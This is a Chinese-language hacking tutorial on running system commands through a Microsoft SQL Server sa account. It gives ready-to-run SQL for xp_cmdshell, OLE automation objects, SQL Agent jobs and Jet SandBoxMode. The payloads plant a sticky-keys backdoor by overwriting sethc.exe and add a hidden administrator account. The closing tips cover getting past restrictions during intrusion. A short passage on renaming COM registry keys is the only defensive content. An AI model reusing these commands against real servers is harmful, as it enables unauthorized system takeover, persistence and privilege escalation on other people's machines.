mssql的sa权限执行命令方法总结

所属分类: 网络安全 / 黑客教程 阅读数: 78
收藏 0 赞 0 分享
 测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
  一.xp_cmdshell
  EXEC master..xp_cmdshell ‘ipconfig’
  开启xp_cmdshell:
  – To allow advanced options to be changed.
  EXEC sp_configure ’show advanced options’, 1
  GO
  – To update the currently configured value for advanced options.
  RECONFIGURE
  GO
  – To enable the feature.
  EXEC sp_configure ‘xp_cmdshell’, 1
  GO
  – To update the currently configured value for this feature.
  RECONFIGURE
  GO
  二.sp_oacreate
  创建wscript.shell对象
  use master declare @o int exec sp_oacreate ‘wscript.shell’,@o out exec sp_oamethod @o,‘run’,null,‘cmd /c "net user" > c:\test.tmp’
  创建scripting.filesystemobject对象
  declare @o int
  exec sp_oacreate ’scripting.filesystemobject’, @o out
  exec sp_oamethod @o, ‘copyfile’,null,‘c:\windows\explorer.exe’ ,‘c:\windows\system32\sethc.exe’;
  declare @oo int
  exec sp_oacreate ’scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,‘c:\windows\system32\sethc.exe’ ,‘c:\windows\system32\dllcache\sethc.exe’;
  可以用utilman.exe代替sethc.exe达到同样的效果 后门很酷吗,呵呵
  创建Shell.Application对象
  declare @o int
  exec sp_oacreate ‘Shell.Application’, @o out
  exec sp_oamethod @o, ‘ShellExecute’,null, ‘cmd.exe’,‘cmd /c net user >c:\test.txt’,‘c:\windows\system32′,”,1;
  开启OLE Automation Procedures
  sp_configure ’show advanced options’, 1;
  GO
  RECONFIGURE;
  GO
  sp_configure ‘Ole Automation Procedures’, 1;
  GO
  RECONFIGURE;
  GO
  我们的对策就是把对象做一下手脚
  WScript.Shell可以调用系统内核运行DOS基本命令
  可以通过修改注册表,将此组件改名,来防止危害。
  HKEY_CLASSES_ROOT\WScript.Shell\
  及HKEY_CLASSES_ROOT\WScript.Shell.1\
  改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
  自己以后调用的时候使用这个就可以正常调用此组件了
  也要将clsid值也改一下
  HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
  HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
  同wscript.shell理、scripting.filesystemobject、Shell.Application
  三.JOB
  利用JOB执行命令,有一个先决条件就是开启SQLSERVERAGENT服务,下面的语句可以开启
  exec master.dbo.xp_servicecontrol ’start’,'SQLSERVERAGENT’
  use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,‘x’ exec sp_add_job ‘x’ exec
  sp_add_jobstep null,‘x’,null,‘1′,‘cmdexec’,‘cmd /c "net user>c:\test.test"’ exec sp_add_jobserver
  null,‘x’,@@servername exec sp_start_job ‘x’;
  四.SandBoxMode(网上常说的沙盒模式)
  原理:在access里调用VBS的shell函数,以system权限执行任何命令。但是试用这个函数之前必须把注册表里的一个叫SandBoxmode的开关打开,
  注册表:HKEY_LOCAL_MACHINE\SoFtWare\Micris
  oft\Jet\4.0\Engine\SandBoxmode.默认值为2,这个人键值为0表示始
  终禁用SandBoxmode模式,1表示对于非Acess应用程序试用SandBoxmode模式,2表示对access应用程序使用SandBoxmode模式,3则表示完全开启安全设置。//1或0都可以执行命令
  EXEC sp_addlinkedserver ‘testsql’,'OLE DB Provider for Jet’,'Microsoft.Jet.OLEDB.4.0′,’c:\windows\system32\ias\ias.mdb’
  exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,1
  EXEC master..xp_regread HKEY_LOCAL_MACHINE ,‘Software\Microsoft\Jet\4.0\engines’,‘SandBoxMode’
  select * from openrowset(‘microsoft
  .jet.oledb.4.0′,‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user test test /add")’)
  select * from openrowset(‘microsoft.jet.oledb.4.0′,
  ‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net localgroup administrators test /add")’)
  下面是系统自带的两个mdb文件
  C:\WINDOWS\system32\ias\dnary.mdb
  C:\WINDOWS\system32\ias\ias.mdb
  总结
  上述几种方法(仔细看看我都忘记有几种了,哈哈。你可以发散思维,再找出来几种)都是在默认情况下测试的,往往渗透的时候有很多限制条件,我们可以逐一克服,利用组件得到服务器信息,读取、创建文件了等等,我们还是要对权限这个词组有深层次的理解啊。
  附注
  关于*.exe c:\windows\system32\ 还有c:\windows\system32\dllcache呢
  关于cmd.exe还有command.exe呢
  关于net.exe还有net1.exe呢
  Mdb文件不存在我们可以上传一个啊
  执行命令的组件不是只有一个哦

更多精彩内容其他人还在看

黑客七大惯用攻击策略(攻击与防范)

这篇文章主要介绍了黑客七大惯用攻击策略,你必须掌握!,需要的朋友可以参考下
收藏 0 赞 0 分享

Android平台的SQL注入漏洞浅析(一条短信控制你的手机)

14年11月笔者在百度xteam博客中看到其公开了此前报告给Google的CVE-2014-8507漏洞细节——系统代码在处理经由短信承载的WAP推送内容时产生的经典SQL注入漏洞,影响Android 5.0以下的系统
收藏 0 赞 0 分享

浅析XSS与XSSI异同

这篇文章主要介绍了XSS与XSSI异同,跨站脚本(XSS)和跨站脚本包含(XSSI)之间的区别是什么?防御方法有什么不同?感兴趣的小伙伴们可以参考一下
收藏 0 赞 0 分享

没有苹果官方支持 是否可以重置MAC系统固件密码

不开源就意味着更干净更安全,现在连苹果都要准备部分开源给第三方软件了,是不是意味着苹果的安全也不如想象中的那么强大了?这个猜测并没有证据,有证据的是,iMac和MacBook的固件密码已经可以破解重置了
收藏 0 赞 0 分享

躲避黑客的七大高招教程

现在电脑用户最讨厌的就是黑客,有用户问怎么才能高效的躲避黑客的入侵呢?下面小编就为大家介绍七大高招,让你的电脑时时刻刻处于安全状态
收藏 0 赞 0 分享

在线DDoS攻击平台是什么 DDoS攻击平台的流量获取方式

流量获取是DDOS攻击的最重要一环,黑客主要通过获取厂商服务器的上行流量,致使你的服务器、电脑所属的网络或者系统资源耗尽而瘫痪,让你失去目标客户,借此用来勒索厂商。本文讲述了黑客获取流量的主要六种方式
收藏 0 赞 0 分享

如何提高DDoS攻击效率 增强DDoS攻击效果的思路

在我们的思维都朝着一个方向走的时候,忽然的转向会让人茅塞顿开。黑客在我眼中就是一群思维习惯不同的人,他们从不朝着同一个方向走,所以你才会被他们发现这么多的漏洞。一把手枪,四颗子弹,你能让子弹同时击中同一个目标来达到最强的杀伤力吗
收藏 0 赞 0 分享

十三步简单入侵个人电脑教程

下面小编就为电脑新手们打造了一个教程,从来没有通过网络进入别人电脑的用户快来看看吧,主要使用到的软件就是著名的国产木马冰河2.
收藏 0 赞 0 分享

保护DNS服务器的10点方法小结

本文收集总结了几点保护DNS服务器的有效方法,感兴趣的小伙伴们可以参考一下。
收藏 0 赞 0 分享

DNS协议欺骗攻击技术的攻防知识 DNS欺骗攻击和防范方法有哪些

你是否遭遇过这样的情况?当你在浏览器中输入正确的URL地址,但是打开的并不是你想要去的网站。它可能是114的查询页面,可能是一个广告页面,更可能是一个刷流量的页面,甚至是一个挂马的网站。如果你遇到了上述情况话,那么极有可能你遭遇了DNS欺骗。
收藏 0 赞 0 分享
查看更多